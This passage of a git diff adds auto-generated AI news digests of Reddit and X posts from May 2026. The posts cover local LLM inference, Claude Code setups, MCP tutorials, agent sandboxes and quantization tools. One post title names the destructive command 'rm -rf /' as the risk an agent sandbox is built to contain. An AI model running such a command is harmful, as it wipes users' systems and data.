GPT-5.5 leak its trace during a normal conversation, and it really reads like the caveman mode fad from a few months back. Maybe we can achieve better token efficiency by taking some high-quality thinking trace from an open model, "caveman-izing" it, and fine-tuning on it. Here is the full log of GPT-5.5 going insane: https://gist.github.com/aussetg/20747ae00df17992acb4ebdfcd8d8d88 EDIT: Ok people I got it the first time + +--- + +## [My experience using Claude code with Local Llm, and full guide on how to set it up](https://reddit.com/r/ClaudeAI/comments/1tlir65/my_experience_using_claude_code_with_local_llm/) +*Reddit r/ClaudeAI* | 23/05/2026 | Score: 1.00 +Tags: api_update + +> Wanted to share a workflow I tested on a real flight, in case anyone else is trying to set up offline Claude Code. The core idea: using ollama to pull the needed model of what you need, and then use it to run claude code The setup, in order: 1. Pull a model on home wifi the night before. \`ollama pull <model>\` — \~9 GB for a 14B, \~17 GB for a 26B. Don't try this at the gate. 2. In Claude Code, point at Ollama. The cleanest path I found is wrapping it in two aliases: alias claude-local='ollama launch claude --model gemma4:26b' alias claude-cloud='claude' 3. Verify on the ground with wifi physically off. If it works in airplane mode at home, it works at 10 km in the sky. Where I got it wrong: I prepped qwen2.5-coder:14b first because it's the model everyone recommends in local-LLM threads. On the flight, it choked on Claude Code's tool loop; one call took 25 seconds, another took 52. For a workflow that chains five or six tool calls per task, that's unusable. Switched mid-flight to gemma4:26b (which I'd pulled as a backup). Different category of model, RL-trained for tool use, not just code completion. The tool loop ran at a usable speed. The gap analysis I was running on a… + +--- + +## [Removing Vision from model](https://reddit.com/r/LocalLLaMA/comments/1tlhkts/removing_vision_from_model/) +*Reddit r/LocalLLaMA* | 23/05/2026 | Score: 1.00 +Tags: agent_tool + +> I removed mmproj file from models to remove vision and save my vram. But just curious, is this really don't affect its text ability? I use Qwen 3.6 35b a3b by unsloth and mainly use for agentic coding + +--- + diff --git a/data/digest-2026-05-24.md b/data/digest-2026-05-24.md new file mode 100644 index 0000000..7c969dc --- /dev/null +++ b/data/digest-2026-05-24.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-05-24** | 15 stories | Auto-generated from 365 archived stories + +--- + +## [I built a local GUI for the TradingAgents framework — works with Ollama](https://reddit.com/r/LocalLLaMA/comments/1tm2ct0/i_built_a_local_gui_for_the_tradingagents/) +*Reddit r/LocalLLaMA* | 24/05/2026 | Score: 1.00 +Tags: open_source, developer_tool, cli_tool, tool_update + +> https://preview.redd.it/i90oxxk7n03h1.png?width=1898&format=png&auto=webp&s=7d219c804fda7dfe122b84fcdb6d0d6883818c68 A while back I came across [TradingAgents](https://github.com/TauricResearch/TradingAgents) — a really cool multi-agent LLM stock analysis framework where like a dozen "agents" (market analyst, news analyst, bull researcher, bear researcher, risk team, etc.) debate a stock and produce a final trade recommendation. The output is genuinely interesting to read. Problem: it ships as a CLI. You pick options in a terminal, watch logs scroll, then go hunt for markdown files on disk. The reports are good, the experience of getting to them isn't. So I forked it and bolted on a web GUI. Runs locally, talks to whatever LLM provider you have a key for (OpenAI, Anthropic, Google, OpenRouter, DeepSeek, Ollama, xAI, Qwen, GLM, MiniMax). All Apache 2.0. Some things I ended up adding because I wanted them: * Live pipeline visualization showing which agent is working * Reports tab with a 3-pane reader, table-of-contents, search * A "report length" knob (Concise / Standard / Comprehensive) — concise mode saves \~50% tokens * Multi-session chat where you can pin past report… + +--- + +## [VRAM Suite: early pre-alpha tool for VRAM diagnostics, bounded CUDA probing, and OOM risk estimation](https://reddit.com/r/StableDiffusion/comments/1tmixth/vram_suite_early_prealpha_tool_for_vram/) +*Reddit r/StableDiffusion* | 24/05/2026 | Score: 0.94 +Tags: api_update, developer_tool, cli_tool + +> # I started building VRAM Suite — a small framework for VRAM diagnostics in local AI workflows Hi. I wanted to share a small pre-alpha project I started building: \*\*VRAM Suite\*\*. The basic idea is simple: local AI workflows often fail with CUDA OOM only after everything has already started. I got tired of guessing how much VRAM is actually usable, so I started writing a small Python framework to inspect, record, and later predict VRAM behavior. It is still early, but the current version already has a working foundation. # What works now * CLI command: \`vramsuite doctor\` * Public Python API: \`import vramsuite\` * Structured doctor API: \`run\_doctor()\` * System/runtime fingerprinting * Optional PyTorch/CUDA detection * NVIDIA GPU memory reading through NVML using \`ctypes\` * Driver-level total/free/used VRAM without requiring PyTorch * \`.vramcard\` JSON profile format * Rich terminal report output * Optional bounded CUDA allocation probe through PyTorch * Basic OOM risk estimation using \`--estimate-mb\` # Example `uv run vramsuite doctor --probe --probe-max-mb 12288 --probe-step-mb 256 --probe-free-floor-mb 2048 --estimate-mb 8000` # Example output summary from my RTX 50… + +--- + +## [Claude working autonomously](https://reddit.com/r/ClaudeAI/comments/1tm9gm5/claude_working_autonomously/) +*Reddit r/ClaudeAI* | 24/05/2026 | Score: 0.86 +Tags: api_update, mcp, developer_tool + +> Goodmorning, Has anyone figure out how to configure Claude so that it runs autonomously, almost like Openclaw? I wanted to figure out if it could just autonomously respond to LinkedIn messages and reach out on my behalf? I know i can do this within cowork with mcp servers and tools but didn’t know if managed agents or the SDK would be my best option to try and create this full system + +--- + +## [Agent Zero CLI Update Signals Computer Use Polish For Agent Frameworks](https://x.com/alessandro_a0/status/2058278886572433812) +*Aligned News (Scoble)* | 24/05/2026 | Score: 1.00 +Tags: cli_tool, agent_tool + +> A current post says A0 CLI v1.11 and Agent Zero v1.17 are live after a Computer Use announcement. + +--- + +## [Working on a cgo-free CUDA binding in Go for ML stuff Week 3 - open source [P]](https://reddit.com/r/MachineLearning/comments/1tmb4qw/working_on_a_cgofree_cuda_binding_in_go_for_ml/) +*Reddit r/MachineLearning* | 24/05/2026 | Score: 1.00 +Tags: api_update, open_source + +> At our work we use CUDA in Rust since the company switched to it recently. Rust has pretty good Driver API bindings but it made me wonder why the hell we cant have something decent in Go without cgo. I mostly build ML tools in the last month and Go is my main language for pretty much everything. Problem is most Go CUDA projects still need cgo and the full toolkit at build time. That breaks cross compilation and makes Docker images huge which sucks when working on machine learning projects. So last month I started messing around with a proof of concept that loads [libcuda.so](http://libcuda.so) at runtime using purego. No cgo at all. Biggest pain was thread affinity. CUDA keeps context per thread so goroutines switching around kept breaking things. I built a simple executor that locks an OS thread with runtime.LockOSThread and funnels all calls through a channel. Heres roughly what using it looks like right now: func run() error { cuda.Init() dev, _ := cuda.GetDevice(0) ctx, _ := dev.Primary() defer ctx.Close() a, _ := cuda.Alloc[float32](ctx, 1024) b, _ := cuda.Alloc[float32](ctx, 1024) c, _ := cuda.Alloc[float32](ctx, 1024) stream, _ := ctx.NewStream() start, _ := ctx.NewEvent()… + +--- + +## [PapersWithCode new features - week 1 [P]](https://reddit.com/r/MachineLearning/comments/1tmawv5/paperswithcode_new_features_week_1_p/) +*Reddit r/MachineLearning* | 24/05/2026 | Score: 1.00 +Tags: open_source, tool_update + +> Hi, Niels here from the open-source team at Hugging Face. It's been one week since I [launched](https://www.reddit.com/r/MachineLearning/comments/1tgmwqr/reviving_paperswithcode_by_hugging_face_p/) [paperswithcode.co](http://paperswithcode.co), a revival of the website we all loved. It allows us to keep track of the state-of-the-art (SOTA) across various domains of AI, from agents to computer vision and time-series forecasting. The reception has been great, and I'm excited to extend this over the next few months. This week, I've added the following features: \- Support for multiple metrics for a given benchmark: leaderboards now support multiple metrics, see e.g., the [Open ASR Leaderboard](https://paperswithcode.co/benchmark/open-asr-leaderboard) for automatic speech recognition, which supports both Word Error Rate (WER) and the Inverse Real-Time Factor (RTFx) metrics, or the [Object Detection leaderboard](https://paperswithcode.co/benchmark/coco-val2017), which now also reports frames-per-second (FPS) besides mean average precision (mAP) on COCO. https://preview.redd.it/owlxn0b5u23h1.png?width=2878&format=png&auto=webp&s=1dff2f8feab4f160f77c97ceeb5d90e82382e63c \- Su… + +--- + +## [Qwen Plays ̶p̶̶o̶̶k̶̶e̶̶m̶̶o̶̶n̶ ? / QWEN PLAYS DCSS! - qwen3.6-35b-a3b@q4_k_xl plays open source roguelike adventure DCSS (and does a decent job)](https://reddit.com/r/LocalLLaMA/comments/1tm9nx3/qwen_plays_pokemon_qwen_plays_dcss_qwen3635ba3bq4/) +*Reddit r/LocalLLaMA* | 24/05/2026 | Score: 1.00 +Tags: open_source, cli_tool + +> Hi, (TLDR.): Qwen in its MTP version has tool call bugs and outputs everything into tool/thinking blocks - mangeling the output - canceling the +speed with repeated wrong tool calls! DCSS works well with non MTP qwen even on smaller qwants. im Testing the new MTP models and thought the Hermes plays pokemon skill would be fun to test - expecting codex doing a good job and Qwen at least being able to navigate etc - but after a little research it looks like all LLM (even the big ones) cant play pokemon without hickups - so i tried to find a game the LLM can play - to use it as benchmarks - all the numbers from the official benchmarks are a nice indicator but i wanted real tests - after tons of IMG research and push to telegram etc - palying games seemed the next step to test - Qwen can play DCSS in its qwen3.6-35b-a3b@q4\_k\_xl NON MTP VERSION pretty well! in a Terminal you can see/control if needed! - telegram text update + ascii/screenshots on milestones or errors \- MTP version produced mangeled tool calls! (240k context/8koutput token, 0,6 temp/20topK, 1Rep. penalty, 1.5 pres. penalty, 0.95 topP) LM studio on 5090 if anyone is interested in the skill / prompt i can upload it late… + +--- + +## [How I do use the recent llama.cpp native tools to do web rag a.k.a. web_fetch (or anything else for the matter) directly from inside the llama-server's webui](https://reddit.com/r/LocalLLaMA/comments/1tm93ng/how_i_do_use_the_recent_llamacpp_native_tools_to/) +*Reddit r/LocalLLaMA* | 24/05/2026 | Score: 1.00 +Tags: cli_tool, agent_tool + +> As some other fellow lllmers I've discovered few days ago that the amazing llama.cpp project has just added native tools functionalities into the server. After having enabled the relative options into llama-server and played a bit with the most harmless of them all, get\_datetime, I've bit the bullet and cautiously enabled the big boss: exec\_shell\_command. Building upon my recent sandboxing efforts relative to pi coding agent, another fantastic tool, I implemented this workflow to more safely use it into linux by multi-sandboxing: step 0) enabled llama-server options for native tools step 1) install firejail system wide step 2) create a new linux user called vmagents (a.k.a. "virtual machine agent smith") to prevent escalation or messing up with my own user workspace home dir step 3) login into vmagents user and install smolmachines, an easy to use OCI virtual machine containers harness step 4) create a VM called minivm and start it to pull in a bare bones busybox commands based Alpine linux OCI image step 5) create the script minivm-exec (and make it executable) into vmagents exec dir to spinup the sandbox VM, exec a given command into it into further firejail sandbox, turn it… + +--- + +## [48 frontends for Comfy!](https://reddit.com/r/StableDiffusion/comments/1tm25k8/48_frontends_for_comfy/) +*Reddit r/StableDiffusion* | 24/05/2026 | Score: 1.00 +Tags: api_update, tool_update + +> This is an update of the list that I made 5 months ago. [4 months ago it was 26](https://www.reddit.com/r/StableDiffusion/comments/1qyrw4z/26_frontends_for_comfy/). Many of UIs were suggested by user iwr-redmond. Below is list with only names; links, descriptions are in the awesome list itself on github: [https://github.com/light-and-ray/awesome-alternative-uis-for-comfyui](https://github.com/light-and-ray/awesome-alternative-uis-for-comfyui) Category 1: Close integration, work with the same workflows 1. SwarmUI 2. Minimalistic Comfy Wrapper WebUI 3. Open Creative Studio for ComfyUI 4. ComfyUI Mobile Frontend 5. ComfyMobileUI 6. ComfyChair 7. ComfyScript 8. WorkflowUI 9. FlowScale AIOS 10. ComfyUI-Workflow-Studio 11. Promptus CosyUI Category 2: UI for workflows exported in API format 1. ViewComfy 2. ComfyUI Mini 3. Generative AI for Krita (Krita AI diffusion) 4. Intel AI Playground 5. Comfy App (ComfyUIMobileApp) 6. ComfyUI Workflow Hub 7. Mycraft 8. ComfyUI WebUI Generator 9. Nexa - Your On-the-Go ComfyUI Companion 10. CivitDeck 11. ComfyUI Skills for OpenClaw 12. ComfyUI\_bsk\_UI 13. OutSweeper 14. Orange Category 3: Use Comfy UI as runner server (worklows made by developers) 1.… + +--- + +## [🚀 Skills for small businesses, officially released by Anthropic](https://reddit.com/r/ClaudeAI/comments/1tm94ai/skills_for_small_businesses_officially_released/) +*Reddit r/ClaudeAI* | 24/05/2026 | Score: 0.86 +Tags: developer_tool, agent_tool + +> Anthropic’s 31 small-business skills reportedly hit around 382,000 downloads on day one. And now someone has mapped the whole thing into a setup workflow that can apparently be deployed in \~10 minutes. This is actually a pretty interesting shift. Small businesses used to stitch together automations manually across: Zapier Notion CRM tools email workflows internal docs custom scripts Now AI companies are starting to package the whole thing into reusable skill packs: 🧠 workflow 📚 memory ⚙️ behavior 🔗 connectors 🤖 orchestration 📋 operating rules Basically: business operations as AI-readable skill files. The best part? You don’t necessarily need Claude to use them. At the core, these are still .md skill files describing workflows for AI agents. So even if you’re using Codex, Cursor, Gemini, or another coding agent, you can still study the structure, adapt the workflows, and plug the ideas into your own agent setup. This feels like the beginning of a new category: “AI business operating templates.” GitHub: https://github.com/anthropics/knowledge-work-plugins + +--- + +## [Claude code - Cultivate your context window to get the max out of your tokens](https://reddit.com/r/ClaudeAI/comments/1tm594m/claude_code_cultivate_your_context_window_to_get/) +*Reddit r/ClaudeAI* | 24/05/2026 | Score: 0.86 +Tags: api_update, mcp + +> Many times during the start of the session or when you have cleared or compacted the session, claude tends to read the entire codebase resulting in context window bloating. if your repo is large and/or if you are working with multiple repos it means your context window will have a lot of stuff which are not really relevant for the feature work that you are doing rn. Instead of claude having to read the entire codebase you have a map of your repos at different granularity and guide claude using [claude.md](http://claude.md) file to read the map. this helps claude get the context better without the context window bloating. if you are working on typescript/javascript based repos you can check what i built here in this repo: [https://github.com/justinjamesmathew/tokenmax-mcp](https://github.com/justinjamesmathew/tokenmax-mcp) the idea is to have three tiers of structural context loaded at three different times. The Registry is a small directory of every repo that is registered, with a short paragraph for each covering what it does, what stack it uses, where it lives, and when it was last indexed. It loads automatically into every Claude Code session via \~/.claude/[CLAUDE.md](http://c… + +--- + +## [LongCat-Video-Avatar 1.5 Release](https://reddit.com/r/StableDiffusion/comments/1tm5oxh/longcatvideoavatar_15_release/) +*Reddit r/StableDiffusion* | 24/05/2026 | Score: 0.78 +Tags: open_source, developer_tool + +> HuggingFace Link: [meituan-longcat/LongCat-Video-Avatar-1.5 · Hugging Face](https://huggingface.co/meituan-longcat/LongCat-Video-Avatar-1.5) LongCat-Video-Avatar 1.5, an upgraded open-source framework that prioritizes extreme empirical optimization and production-readiness for audio-driven human video generation. Built upon the LongCat-Video foundation model, v1.5 delivers highly stable, commercial-grade avatar video synthesis supporting native tasks including Audio-Text-to-Video (AT2V), Audio-Text-Image-to-Video (ATI2V), and Video Continuation, with seamless compatibility for both single-stream and multi-stream audio inputs. # [](https://huggingface.co/meituan-longcat/LongCat-Video-Avatar-1.5#key-features)Key Features * 🌟 **Upgraded Audio Encoder (Whisper-Large):**: Replaces Wav2Vec2 with Whisper-Large, yielding significantly smoother and more natural lip dynamics. * 🌟 **Production-Ready Stability**: Achieves accurate lip-synchronization, full-body temporal stability, and robust long-video generation with strict identity consistency. * 🌟 **Stylized Domain Generalization**: Robustly generalizes to anime, animals, and complex real-world conditions such as multi-person interactio… + +--- + +## [Claude records demo videos for me now](https://reddit.com/r/ClaudeAI/comments/1tmkee4/claude_records_demo_videos_for_me_now/) +*Reddit r/ClaudeAI* | 24/05/2026 | Score: 0.62 +Tags: open_source, tool_update + +> I hate recording demo videos, so I made an open source skill for it: [https://github.com/MobAI-App/desktop-recorder-skill](https://github.com/MobAI-App/desktop-recorder-skill) Now I can give Claude a prompt like: Record a short demo of this app flow And it handles the annoying parts for me: preparing the app state, clicking through the flow, recording, adding cursor/click effects and captions, then exporting the video. So instead of spending time setting everything up and recording the same demo manually, I can let Claude do it while I work on something else. It also has Remotion integration, so Claude can generate more polished and editable videos from the recording, not just raw screen captures. The video attached to this post is the result of the skill itself. Also working on the same idea for mobile apps: [https://github.com/MobAI-App/mobile-recorder-skill](https://github.com/MobAI-App/mobile-recorder-skill) + +--- + +## [hipEngine: Fast Native Qwen 3.6 Inference for RDNA3 (Strix Halo, 7900 XTX)](https://reddit.com/r/LocalLLaMA/comments/1tmq4s6/hipengine_fast_native_qwen_36_inference_for_rdna3/) +*Reddit r/LocalLLaMA* | 24/05/2026 | Score: 1.00 +Tags: open_source + +> A few weeks ago, after finishing [FastDMS](https://www.reddit.com/r/LocalLLaMA/comments/1t3vlrx/fastdms_64x_kvcache_compression_running_faster/), I started toying around writing some RDNA3 kernels again to see how fast I could get Qwen 3.6 MoE running. It turned out well enough, so over the past couple weeks, I turned those experiments into [hipEngine](https://github.com/shisa-ai/hipEngine), a new open source (AGPLv3) ROCm-native local LLM inference engine. It's Python based, but with no heavy PyTorch dependency. All the hot-path is HIP/C++, making liberal use of AMD native libs like hipBLASLt, hipGraph, AOTriton, etc. ### gfx1100 (Radeon RX 7900 XTX / Radeon Pro W7900) The initial implementation has Qwen 3.6 (MoE and dense) running competitively with llama.cpp, with the [ParoQuant](https://github.com/shisa-ai/paroquant) (which I've also ported to be ROCm compatible) 4.68bpw having better c=1 prefill ("prompt processing") at every tested context length, from 512-128K on gfx1100 (W7900/7900 XTX): ### Prefill tok/s | Workload | hipEngine PARO | hipEngine GGUF Q4_K_S | llama.cpp HIP | llama.cpp Vulkan | | --- | ---: | ---: | ---: | ---: | | 512/128 | **2718.497** | 2258.847 | 2436.04… + +--- + +## [MergeNB: An intuitive merge conflict resolver built for Jupyter notebooks in VS Code [P]](https://reddit.com/r/MachineLearning/comments/1tmq1eb/mergenb_an_intuitive_merge_conflict_resolver/) +*Reddit r/MachineLearning* | 24/05/2026 | Score: 1.00 +Tags: developer_tool + +> I used to work heavily with Jupyter Notebooks + git + VS Code in a collaborative research setting and found nbdime to be somewhat buggy/a hassle to work with in general. So, in typical side project fashion ([relevant xkcd](https://xkcd.com/1319/)) I've been working on MergeNB quite a bit over the last 6 months or so. It's (currently only) a VS Code extension with a web UI, and has a few cool improvements over other alternatives, which I outlined in the README/docs site. I'd be over the moon if this actually gets used by people, and would love a star if it's interesting. See [https://github.com/Avni2000/MergeNB](http://github.com/Avni2000/MergeNB). I've also been working on a static documentation site here: [https://avni2000.github.io/MergeNB/docs](https://avni2000.github.io/MergeNB/docs) I'm planning on working on it a lot more over the summer and properly fleshing out a few of the ideas I had (including making it a git mergetool as well as a VS Code extension), so if you'd like to contribute, feel free to raise an issue or shoot me a message/email :) + +--- + diff --git a/data/digest-2026-05-25.md b/data/digest-2026-05-25.md new file mode 100644 index 0000000..2052675 --- /dev/null +++ b/data/digest-2026-05-25.md @@ -0,0 +1,123 @@ +# Stack Scout - AI News Digest +**2026-05-25** | 15 stories | Auto-generated from 588 archived stories + +--- + +## [I made a local-first MCP tutorial repo with node-llama-cpp and a custom agent loop](https://reddit.com/r/LocalLLaMA/comments/1tn1jjy/i_made_a_localfirst_mcp_tutorial_repo_with/) +*Reddit r/LocalLLaMA* | 25/05/2026 | Score: 1.00 +Tags: api_update, mcp, developer_tool, cli_tool, tool_update + +> I just published a repo called MCP from Scratch that teaches the Model Context Protocol by building it step by step in plain Node.js. Most of the repo is about understanding MCP itself, but the later modules may be relevant here: I added a local-first setup using `node-llama-cpp`, GGUF models, MCP sampling, and a custom plan -> act -> observe agent loop. So the repo goes from: * raw JSON-RPC and stdio transport * to a working MCP server with tools/resources/prompts * to local model integration * to an agent loop that uses MCP tools with a local GGUF model There’s also an optional LangChain example, but the main path is intentionally minimal and tries to make the underlying mechanics obvious. Key points: * plain Node.js, minimal abstractions * designed as a learning repo, not a production SDK * uses shared local GGUF models for the later modules * built for people who want to understand what MCP tooling is actually doing under the hood Repo: [https://github.com/pguso/mcp-from-scratch](https://github.com/pguso/mcp-from-scratch) Would especially love feedback from people here on the local inference side: * model choice * whether the agent loop examples feel useful or too toy-ish + +--- + +## [I stress-tested Kimi K2.6 against Claude Opus 4.7 on a quick coding-agent task](https://reddit.com/r/ClaudeAI/comments/1tn9fpq/i_stresstested_kimi_k26_against_claude_opus_47_on/) +*Reddit r/ClaudeAI* | 25/05/2026 | Score: 1.00 +Tags: api_update, open_source, tool_update, agent_tool + +> I tested Claude Opus 4.7 and Kimi K2.6 on the same coding agent task i.e. build an AI Fix Runner that takes a broken repo, runs its tests, identifies the failure, applies a patch, reruns the test, and exposes the final diff/logs through an API and UI. The goal was not to benchmark syntax completion or simple repo edits. I wanted to test model behavior on a less familiar integration path: shifting execution from local processes into remote sandboxes. I used Tensorlake specifically because the sandbox API is newer and integration-heavy. This made the test more about whether the model could reason through unfamiliar infra and produce a working implementation. Setup: * Claude Opus 4.7 through Claude Code * Kimi K2.6 through OpenCode via OpenRouter Pricing context: * Claude Opus 4.7: $5/M input, $25/M output * Kimi K2.6: $0.95/M input ($0.16 cached input), $4/M output So, what made it interesting is if Kimi's lower cost can handle a crazy workflow. To be clear, comparing Kimi K2.6 directly with Opus 4.7 is not completely fair. The model classes, pricing, and expected capability levels are very different. I mainly wanted to see how far an open model could get on the same task at a fract… + +--- + +## [Workbench Launches Open Source BullMQ Dashboard For Node Backends](https://x.com/pontusab/status/2058588422001029549) +*Aligned News (Scoble)* | 25/05/2026 | Score: 1.00 +Tags: product_launch, open_source, tool_update + +> Workbench launched as an open-source BullMQ dashboard with flows, metrics, schedulers, and search for Node backends. + +--- + +## [Ditched GitHub Copilot yearly subscription. What's the best way to run Claude nowadays?](https://reddit.com/r/ClaudeAI/comments/1tnl23a/ditched_github_copilot_yearly_subscription_whats/) +*Reddit r/ClaudeAI* | 25/05/2026 | Score: 0.94 +Tags: api_update, developer_tool, cli_tool + +> Hey everyone, I recently cancelled my yearly GitHub Copilot subscription. My old workflow was simple: I used the GitHub Copilot extension in VS Code, but I swapped the backend model to Sonnet / Opus and relied heavily on the `/plan` command to code. I absolutely loved it and I would like that exact flow back. My plan was to just go full Bring Your Own Key (BYOK) inside VS Code using an API key and pay per token for Sonnet or Opus. However, I’m seeing all this hype around CLI tools, and it has me second-guessing my setup. I’m completely open to trying new workflows if they are a massive upgrade, but honestly, I’d be much happier just staying in my cozy VS Code environment if the math makes sense. so my questions are: 1. Is a flat Claude subscription actually cheaper than an API key for heavy coding? In my old copilot plan I believe just once I used all my tokens per month. 2. How bad is the token bleed if I stick to BYOK? I heard with CLI you make some markdown files and things get cheaper / faster. Can you do that with BYOK as well? thanks for any advice! + +--- + +## [I built a meme-y social feed for programmers that lives inside Claude Code (and Cursor, and Copilot CLI)](https://reddit.com/r/ClaudeAI/comments/1tnlji5/i_built_a_memey_social_feed_for_programmers_that/) +*Reddit r/ClaudeAI* | 25/05/2026 | Score: 1.00 +Tags: developer_tool, cli_tool + +> I spend hours every day in Claude Code, but I started feeling weirdly isolated. So I built a tiny social network that lives inside it. WAYD ("What Are You Doing?") is a Claude Code skill. You type `/wayd` and either post a short "vibe" about your coding day or scroll a random feed of what other developers are losing their minds over. React with emojis, drop a one-line reply, get back to work. The whole thing runs on GitHub Issues as the silent backend. No server, no database, no signup, just your existing `gh` CLI. You never see issues, JSON, or `gh` commands; the skill orchestrates everything in the background. It feels like a tiny social app inside the terminal. 8 vibe-tags to pick from when you post: 🤡 cursed-code, 🪦 rip-me, 🫠 brain-melt, 🧙 dark-arts, 🔥 hot-take, 💭 shower-thought, 🤔 existential, ☕ procrastinating. Each is a mood, not a topic. Write up to 1000 chars, publish under your real GitHub handle, scroll a random feed of strangers doing the same. **Install on Claude Code**: claude plugin marketplace add ferdinandobons/wayd claude plugin install wayd@wayd Other install methods + screenshots: [https://github.com/ferdinandobons/wayd](https://github.com/ferdinandobons… + +--- + +## [Is AI inference platform really that saturated now? [D]](https://reddit.com/r/MachineLearning/comments/1tngk7p/is_ai_inference_platform_really_that_saturated/) +*Reddit r/MachineLearning* | 25/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> I’m thinking of expanding an on-device inference SDk into a full blown AI inference platform and seeing more and more inference platform popping out. Been talking with a VC from Seattle/NY. Is this space really that saturated? + +--- + +## [Reconstructing the agent methodology: Decoupling decision-making and execution - open source [P]](https://reddit.com/r/MachineLearning/comments/1tnfxsc/reconstructing_the_agent_methodology_decoupling/) +*Reddit r/MachineLearning* | 25/05/2026 | Score: 1.00 +Tags: open_source, cli_tool + +> I’ve been thinking about a problem in current agent systems: Most agents are becoming very good at execution, but the decision layer before execution is still unclear. Coding agents, research agents, tool loops, sandboxes, workflows, and harnesses are all improving quickly. Once a human gives an intent, agents can often do a lot of useful work. But the higher-level question is still usually left to the user: What should happen next, and why? I’ve been exploring this idea through an open-source project called Spice. The simplest way to describe it is: Spice is a decision layer above agents. It is not trying to replace execution agents. Tools like Claude Code, Codex, Hermes, or other agents can still do the actual work. Instead, Spice sits before execution and tries to make the decision process explicit: - what was observed - what options were considered - why one option was selected - what trade-offs were rejected - whether execution needs approval - what happened afterward - how that outcome should affect the next decision The current runtime is still early, but it can already be installed, configured with an LLM provider, run in the terminal, inspect Decision Cards, and hand off… + +--- + +## [I’m building an open-source decision layer above AI agents [P]](https://reddit.com/r/MachineLearning/comments/1tndi8y/im_building_an_opensource_decision_layer_above_ai/) +*Reddit r/MachineLearning* | 25/05/2026 | Score: 1.00 +Tags: open_source, cli_tool + +> Hi everyone, I’m Jia, the creator of Spice. I’ve been working on an open-source project called Spice. The simplest way to describe it is: Spice is a decision layer above agents. Most agent systems today are very focused on execution, They are getting better at doing tasks after a human gives them an intent. But the higher-level question is still usually left to the user: What should happen next, and why? That is the layer I want Spice to explore. Spice is not trying to replace execution agents. Tools like Claude Code, Codex, Hermes, or other agents can still do the actual work. Instead, Spice sits before execution and tries to make the decision process explicit: - what was observed - what options were considered - why one option was selected - what trade-offs were rejected - what happened afterward - how that outcome should affect the next decision The current runtime is still early, but you can already install it, set up an LLM provider, run it in the terminal, inspect Decision Cards, and hand off approved execution to external agents. My goal is to make agent behavior less of a black box. Instead of only seeing the final result of an agent task, I want to preserve the reasoning… + +--- + +## [I built a computer use sandbox framework for codex on headless linux. GPU passthrough, computer use, and sudo access for codex all work. It's the perfect dev sandbox to allow full auto work while minimizing the "rm -rf /" risk](https://reddit.com/r/LocalLLaMA/comments/1tn3i55/i_built_a_computer_use_sandbox_framework_for/) +*Reddit r/LocalLLaMA* | 25/05/2026 | Score: 1.00 +Tags: developer_tool, agent_tool + +> I've been working with agents for months now, and I haven't found a sandbox environment that "just works" so I built it! My requirements were as follows: 1. Agent is unable to destroy my host OS but able to install software and run sudo commands 2. Agent is able to browse the web autonomously and validate the UI it creates 3. GPU access works (even on DGX spark which cant pass through to 4. Docker works 5. Persistent environment I can setup once, log into my internet accounts I want the agent to access, copy in my .env files, install custom software etc. 6. Support multiple parallel browser use / development sessions concurrently 7. Easily log into each agent's desktop to view the work it's doing or manually setup the agent environment via a desktop interface The inspiration for this project is wanting a sandbox I can let the agent run free in, while limiting the damage it can do. I want it to be able to browse the web, do automated AI research on my GPU, test my docker containers in a sandbox, develop my webapp full-auto, or whatever other task I need it to do while still being safely in a sandbox and unable to wipe or modify my host system. I felt like either I had to go full YO… + +--- + +## [We added W8A8 activation quantization to MLX — prefill went from 2.84s to 2.52s on M5 Pro](https://reddit.com/r/LocalLLaMA/comments/1tn2p61/we_added_w8a8_activation_quantization_to_mlx/) +*Reddit r/LocalLLaMA* | 25/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> Hey, I work on inference tooling at Mininglamp AI. We needed faster prefill for a 4B VLM running on Apple Silicon. Problem was MLX only does weight-only quant — activations stay FP16 the whole way through. So we wrote Cider, a small SDK that adds W8A8 activation quant on top of MLX. Numbers on M5 Pro (64GB, 307 GB/s), 4516 token context: |Quantization|Prefill|Decode| |:-|:-|:-| |W8A16 (MLX)|2.839s|80.1 tok/s| |W8A8 (Cider)|2.519s|79.5 tok/s| Under the hood it's custom Metal kernels we registered as MLX primitives. At M=4096 the per-channel path runs 1.84x faster than W8A16 on the same shape. Not just for our model btw — works with anything that runs through MLX. One catch: INT8 TensorOps only compile on M5 and above. pip install on M4 still works, just falls back to the regular path. Repo: [https://github.com/Mininglamp-AI/cider](https://github.com/Mininglamp-AI/cider) Edit: adding accuracy numbers since it came up. Wikitext2 PPL on Qwen3-8B: FP16 9.73, W8A16 9.71, W8A8 per-channel 9.76. Llama3-8B: FP16 6.14, W8A16 6.15, W8A8 per-channel 6.27. Per-group gs=64 keeps it tighter if precision matters more than speed for your use case. + +--- + +## [xAI releases Grok Build 0.1.219, fixing kitty terminal layout issues and paste-related data loss](https://www.digg.com/ai/hlcz47lw) +*Digg AI* | Score: 1.00 +Tags: product_launch, cli_tool + +--- + +## [Wrote a custom C++ engine for MiniCPM-V 4.6 on Orange Pi AIPro (Ascend 310B) to bypass framework overhead](https://reddit.com/r/LocalLLaMA/comments/1tmy4g9/wrote_a_custom_c_engine_for_minicpmv_46_on_orange/) +*Reddit r/LocalLLaMA* | 25/05/2026 | Score: 1.00 +Tags: open_source, developer_tool + +> Hey everyone, just wanted to share a project I've been hacking on for the last few weeks. I managed to build a from-scratch C++ inference engine to run MiniCPM-V 4.6 entirely on the Orange Pi AIPro (the budget board with the Ascend 310B NPU, costs around $149 for 20 TOPS INT8 / 10 TFLOPS FP16). If you want to check out the custom ops, build scripts, or the Gradio web UI, the repository is open source on GitHub at [github.com/lvyufeng/minicpm-v-4.6-orangepi](http://github.com/lvyufeng/minicpm-v-4.6-orangepi) https://preview.redd.it/upfsqb0jm73h1.png?width=1655&format=png&auto=webp&s=1e80185171fa6db651d81e20d717b3a05791614c If you've ever tried deploying local LLMs or VLMs on this specific hardware, you probably know that dealing with the standard framework stack can be a massive pain, especially if you want to get any decent performance on the edge. To get around this, I skipped the heavy frameworks and went low-level. Both the text generation and the SigLIP vision tower run natively on the NPU inside a single C++ subprocess. There is absolutely zero torch\_npu dependency on the hot path. Python is only used on the cold path for CPU-side tokenization and image preproces… + +--- + +## [I shipped a windows desktop app for running local LLMs with a button that turns your "no thats wrong" into actual LoRA training data](https://reddit.com/r/LocalLLaMA/comments/1tmxp03/i_shipped_a_windows_desktop_app_for_running_local/) +*Reddit r/LocalLLaMA* | 25/05/2026 | Score: 1.00 +Tags: api_update, cli_tool + +> i built a local AI desktop 